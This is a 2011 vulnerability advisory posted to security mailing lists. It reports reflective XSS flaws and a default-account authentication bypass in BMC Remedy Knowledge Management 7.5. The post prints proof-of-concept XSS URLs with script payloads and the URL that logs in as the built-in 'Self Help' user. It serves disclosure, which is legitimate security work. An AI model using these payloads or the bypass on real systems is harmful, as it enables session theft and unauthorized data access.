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Date: Thu, 5 May 2011 17:34:21 +0100
From: research <research@...checkup.com>
To: <vuln@...unia.com>, <full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>, <news@...uriteam.com>
Subject: PR10-13: Multiple XSS and Authentication flaws within BMC Remedy
 Knowledge Management

PR10-13: Multiple XSS and Authentication flaws within BMC Remedy
Knowledge Management

Vulnerability found: 17th July 2010

Vendor informed:

Vulnerability fixed:

Severity: High

Description:

BMC Remedy Knowledge Management provides service desk analysts with a
knowledge base of easy-to-find solutions and gives users self-service
search options to help them resolve issues on their own. ProCheckUp has
discovered that multiple Remedy Knowledge Management pages are
vulnerable to reflective XSS attacks, a built in self help account
allows for authentication bypass.

Version: 7.5.00    - http://www.bmc.com/


1) The following demonstrate the reflective XSS flaws

https://target-domain.foo/rkm/external.jsp?doc='%3balert(1)//&user=Self+Help

https://target-domain.foo/rkm/search.jsp?user=Self+Help&startDate=\'%3balert(1)//

https://target-domain.foo/rkm/usersettings.jsp?"><script>alert(1)</script>

https://target-domain.foo/rkm/viewdoc.jsp?doc=><script>alert(1)</script>&user=Self%20Help

Works on IE - login screen referrer XSS
https://target-domain.foo/rkm/AttachmentServlet?="><script>alert(1)</script>

Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties.

2) Remedy Knowledge  Management is vulnerable to authentication bypass
by using a built in default account. (user=Self%20Help)

https://target-domain.foo/rkm/index.jsp?user=Self%20Help

The following directory requires a password to authenticate only
https://target-domain.foo/rkm/configuration


Consequences:
An attacker may be able to gain access to data held within a Remedy
Knowledge Managment based site.


Fix:
.

References:
http://www.procheckup.com/Vulnerabilities.php

Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)

Legal:
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to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
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